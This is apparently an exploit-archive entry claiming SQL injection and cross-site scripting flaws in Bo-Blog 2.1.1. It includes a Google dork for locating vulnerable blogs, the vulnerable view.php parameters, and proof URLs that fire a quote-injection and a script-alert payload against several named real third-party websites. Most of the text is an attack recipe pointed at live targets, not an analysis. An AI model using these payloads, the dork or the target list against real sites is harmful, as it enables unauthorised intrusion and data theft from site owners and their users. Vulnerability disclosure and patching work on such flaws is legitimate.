Bo-Blog version 2.1.1 suffers from cross site scripting and remote SQL injection vulnerabilities. Note that this finding houses site-specific data.
ad3a89139420c4fb38aad074bef3977f
# Exploit Title : Bo-Blog 2.1.1 Multiple Vulnerabilites
#****************************************************************************
# Exploit Author : Ashiyane Digital Security Team
#************************************************
# Official site : http://www.bo-blog.com/
# Tested on: Windows,Linux
#*************************
#
#///////////////////////////////////////////////
# Google Dork : intext:"Powered by Bo-Blog 2.1.1"
#///////////////////////////////////////////////
#
# Exploit 1 : Sql Injection
#
# Location : /view.php?go=userlist&ordered=1[Sql Injection]
#
#
# Proof:
#
# http://www.landsaywilson.com//view.php?go=userlist&ordered=1%27
#
# http://itaoblog.com/view.php?go=userlist&ordered=1%27
#
# http://www.landsaywilson.com//view.php?go=userlist&ordered=1%27
#
# http://www.9enjoy.com/view.php?go=userlist&ordered=1%27
#
# http://www.hongcn.com/en/view.php?go=userlist&ordered=1%27
-----------------------------------------------------------------------------
# Exploit 2 : Cross site scripting
#
# Location : /view.php?go=userlist&ordered=1&usergroup=[xss]
#
# Location : /blog//view.php?go=userlist&ordered=1&usergroup=[xss]
#
#
# Proof:
#
#
http://itaoblog.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# www.landsaywilson.com//view.php?go=userlist&ordered=1&usergroup=
"/><script>alert(1);</script>
#
#
http://www.boneboy.net/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
http://itlife365.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
http://www.hongcn.com/en/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
##############--------
discovered by : ACC3SS
##############--------
Comments
Subscribe to this comment feedNo comments yet, be the first!